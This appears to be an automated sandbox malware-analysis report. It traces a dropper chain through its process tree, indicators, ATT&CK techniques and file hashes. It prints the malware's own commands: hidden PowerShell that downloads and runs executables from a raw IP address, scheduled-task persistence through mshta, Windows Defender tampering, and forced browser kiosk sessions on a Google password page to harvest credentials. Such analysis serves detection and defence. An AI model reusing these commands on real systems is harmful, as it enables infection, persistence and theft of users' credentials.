pid Process 784 random.exe 784 random.exe 784 random.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 4624 firefox.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2460 cc13325a1d.exe 2168 4c1ad737af.exe 2168 4c1ad737af.exe 2168 4c1ad737af.exe 2568 deb10d5c60.exe 2568 deb10d5c60.exe 2568 deb10d5c60.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4624 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 784 wrote to memory of 2296 784 random.exe 79 PID 784 wrote to memory of 2296 784 random.exe 79 PID 784 wrote to memory of 2296 784 random.exe 79 PID 784 wrote to memory of 4768 784 random.exe 80 PID 784 wrote to memory of 4768 784 random.exe 80 PID 784 wrote to memory of 4768 784 random.exe 80 PID 2296 wrote to memory of 4584 2296 cmd.exe 82 PID 2296 wrote to memory of 4584 2296 cmd.exe 82 PID 2296 wrote to memory of 4584 2296 cmd.exe 82 PID 4768 wrote to memory of 3628 4768 mshta.exe 83 PID 4768 wrote to memory of 3628 4768 mshta.exe 83 PID 4768 wrote to memory of 3628 4768 mshta.exe 83 PID 3628 wrote to memory of 2840 3628 powershell.exe 85 PID 3628 wrote to memory of 2840 3628 powershell.exe 85 PID 3628 wrote to memory of 2840 3628 powershell.exe 85 PID 2840 wrote to memory of 2412 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 86 PID 2840 wrote to memory of 2412 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 86 PID 2840 wrote to memory of 2412 2840 TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE 86 PID 2412 wrote to memory of 2620 2412 skotes.exe 87 PID 2412 wrote to memory of 2620 2412 skotes.exe 87 PID 2412 wrote to memory of 2620 2412 skotes.exe 87 PID 2412 wrote to memory of 2260 2412 skotes.exe 88 PID 2412 wrote to memory of 2260 2412 skotes.exe 88 PID 2412 wrote to memory of 2260 2412 skotes.exe 88 PID 2412 wrote to memory of 3228 2412 skotes.exe 90 PID 2412 wrote to memory of 3228 2412 skotes.exe 90 PID 2412 wrote to memory of 3228 2412 skotes.exe 90 PID 2412 wrote to memory of 4384 2412 skotes.exe 92 PID 2412 wrote to memory of 4384 2412 skotes.exe 92 PID 2412 wrote to memory of 4384 2412 skotes.exe 92 PID 2412 wrote to memory of 3236 2412 skotes.exe 93 PID 2412 wrote to memory of 3236 2412 skotes.exe 93 PID 2412 wrote to memory of 3236 2412 skotes.exe 93 PID 2412 wrote to memory of 2460 2412 skotes.exe 94 PID 2412 wrote to memory of 2460 2412 skotes.exe 94 PID 2412 wrote to memory of 2460 2412 skotes.exe 94 PID 2460 wrote to memory of 2380 2460 cc13325a1d.exe 95 PID 2460 wrote to memory of 2380 2460 cc13325a1d.exe 95 PID 2460 wrote to memory of 2380 2460 cc13325a1d.exe 95 PID 2460 wrote to memory of 2000 2460 cc13325a1d.exe 97 PID 2460 wrote to memory of 2000 2460 cc13325a1d.exe 97 PID 2460 wrote to memory of 2000 2460 cc13325a1d.exe 97 PID 2460 wrote to memory of 4224 2460 cc13325a1d.exe 99 PID 2460 wrote to memory of 4224 2460 cc13325a1d.exe 99 PID 2460 wrote to memory of 4224 2460 cc13325a1d.exe 99 PID 2460 wrote to memory of 3152 2460 cc13325a1d.exe 101 PID 2460 wrote to memory of 3152 2460 cc13325a1d.exe 101 PID 2460 wrote to memory of 3152 2460 cc13325a1d.exe 101 PID 2460 wrote to memory of 3228 2460 cc13325a1d.exe 103 PID 2460 wrote to memory of 3228 2460 cc13325a1d.exe 103 PID 2460 wrote to memory of 3228 2460 cc13325a1d.exe 103 PID 2460 wrote to memory of 1544 2460 cc13325a1d.exe 105 PID 2460 wrote to memory of 1544 2460 cc13325a1d.exe 105 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 PID 1544 wrote to memory of 4624 1544 firefox.exe 106 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\random.exe"C:\Users\Admin\AppData\Local\Temp\random.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn UQrh9maGOjQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\AGP1yrGwm.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn UQrh9maGOjQ /tr "mshta C:\Users\Admin\AppData\Local\Temp\AGP1yrGwm.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4584
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\AGP1yrGwm.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Users\Admin\AppData\Local\TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE"C:\Users\Admin\AppData\Local\TempMTXIGXDGMJP0BJNL3SW6208LSAFWVL3S.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2840 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Admin\AppData\Local\Temp\1070154001\750bf746aa.exe"C:\Users\Admin\AppData\Local\Temp\1070154001\750bf746aa.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2620 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 6367⤵
- Program crash
PID:5348
-
-
-
C:\Users\Admin\AppData\Local\Temp\1070155001\5360676733.exe"C:\Users\Admin\AppData\Local\Temp\1070155001\5360676733.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2260
-
-
C:\Users\Admin\AppData\Local\Temp\1070156001\659a886552.exe"C:\Users\Admin\AppData\Local\Temp\1070156001\659a886552.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
C:\Users\Admin\AppData\Local\Temp\1070157001\b797487b2e.exe"C:\Users\Admin\AppData\Local\Temp\1070157001\b797487b2e.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4384 -
C:\Users\Admin\AppData\Local\Temp\PVXMYCPFZGQON1HINXNB5GKTAJ2.exe"C:\Users\Admin\AppData\Local\Temp\PVXMYCPFZGQON1HINXNB5GKTAJ2.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1972
-
-
C:\Users\Admin\AppData\Local\Temp\0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe"C:\Users\Admin\AppData\Local\Temp\0M5BKRAJ8TF7EXFQ50YNKHP12OSR2M.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4928
-
-
-
C:\Users\Admin\AppData\Local\Temp\1070158001\58560b85f7.exe"C:\Users\Admin\AppData\Local\Temp\1070158001\58560b85f7.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3236
-
-
C:\Users\Admin\AppData\Local\Temp\1070159001\cc13325a1d.exe"C:\Users\Admin\AppData\Local\Temp\1070159001\cc13325a1d.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2000
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3152
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3228
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4624 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2000 -parentBuildID 20240401114208 -prefsHandle 1920 -prefMapHandle 1912 -prefsLen 27347 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {22abb6c8-67b1-4f10-a96a-73c99045fb69} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" gpu9⤵PID:1380
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2436 -parentBuildID 20240401114208 -prefsHandle 2412 -prefMapHandle 2400 -prefsLen 28267 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {40949f3b-3134-4fb1-862e-92785e60c5d0} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" socket9⤵PID:1988
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3056 -childID 1 -isForBrowser -prefsHandle 3068 -prefMapHandle 2876 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {dfe22629-6419-4b60-a854-dee06f14507d} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab9⤵PID:1632
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3928 -childID 2 -isForBrowser -prefsHandle 3920 -prefMapHandle 3916 -prefsLen 32757 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2968d9e2-743a-483e-a7b1-cbd914462b64} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab9⤵PID:3064
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1584 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4752 -prefMapHandle 4748 -prefsLen 32757 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {36cb536c-c5ed-46ca-8fed-7f0313d3fbe9} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" utility9⤵
- Checks processor information in registry
PID:5008
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5328 -childID 3 -isForBrowser -prefsHandle 5304 -prefMapHandle 5308 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7963e600-08cd-42a3-9de8-f8f50da306d3} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab9⤵PID:5412
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5504 -prefMapHandle 5500 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1bde7aa9-da28-40c0-9523-0a70a02607bc} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab9⤵PID:5424
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5412 -childID 5 -isForBrowser -prefsHandle 5640 -prefMapHandle 5644 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c9ca57be-8fb6-4324-a853-b92f4412bdda} 4624 "\\.\pipe\gecko-crash-server-pipe.4624" tab9⤵PID:5436
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1070160001\4c1ad737af.exe"C:\Users\Admin\AppData\Local\Temp\1070160001\4c1ad737af.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2168 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn vkUenmarkPZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\paYd036Ea.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:4340 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn vkUenmarkPZ /tr "mshta C:\Users\Admin\AppData\Local\Temp\paYd036Ea.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4300
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\paYd036Ea.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'CD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768 -
C:\Users\Admin\AppData\Local\TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE"C:\Users\Admin\AppData\Local\TempCD2H2IJGKW1XMTRCJ5PBPXJD9VBQAZPE.EXE"9⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4000
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1070161101\deb10d5c60.exe"C:\Users\Admin\AppData\Local\Temp\1070161101\deb10d5c60.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn mKRJ4maY1jm /tr "mshta C:\Users\Admin\AppData\Local\Temp\nEOu5fpet.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
PID:5016 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn mKRJ4maY1jm /tr "mshta C:\Users\Admin\AppData\Local\Temp\nEOu5fpet.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2676
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\nEOu5fpet.hta7⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1680 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5164 -
C:\Users\Admin\AppData\Local\Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE"C:\Users\Admin\AppData\Local\Temp5CPB6GCA9PLXVQWZFGIYP3XTNJVLITEZ.EXE"9⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1616
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1070162021\am_no.cmd" "6⤵
- System Location Discovery: System Language Discovery
PID:4548 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1070162021\am_no.cmd" any_word7⤵
- System Location Discovery: System Language Discovery
PID:3500 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5116
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:4616 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3916
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:6124 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
PID:5088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4264
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "D5AWUmaNABb" /tr "mshta \"C:\Temp\5k8CXe1Fz.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5340
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\5k8CXe1Fz.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:1740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2032
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:4036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2620 -ip 26201⤵PID:760
-
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exeC:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6128
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
4Windows Service
4Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
5Disable or Modify Tools
5Modify Registry
6Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
782B
MD516d76e35baeb05bc069a12dce9da83f9
SHA1f419fd74265369666595c7ce7823ef75b40b2768
SHA256456b0f7b0be895af21c11af10a2f10ce0f02ead47bdf1de8117d4db4f7e4c3e7
SHA5124063efb47edf9f8b64ef68ad7a2845c31535f3679b6368f9cb402411c7918b82bd6355982821bfb3b7de860b5979b8b0355c15f4d18f85d894e2f2c8e95ef18e
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
53KB
MD506ad34f9739c5159b4d92d702545bd49
SHA19152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92
-
Filesize
16KB
MD5027d49b9cd32cde4962ca84ae8b9c2c7
SHA1f5795865ad888a23c872895408c43f794bb40754
SHA2569d594c925a3531f028d513c3e08b12d9deef9fc26edbc829d7774922f3c1c5be
SHA5121f2389efa1ffa210b0133849ba6187e7eb60fc5f4c9e3ba20725271cf6b9e77baa84b7083fe48fe865a758dff8decb27829de03c0d3ca642c70144c9ca15dfd7
-
Filesize
16KB
MD51c51d5ae7fd6ed0abaaf257e473e50ea
SHA1f2055749b2b8a0387c89c39e6cfb4f0bad12a5fc
SHA256981c84b8dd7c393ee9f17f9d0cf992c9549e6069eee80f5ce75078ad0271ad3f
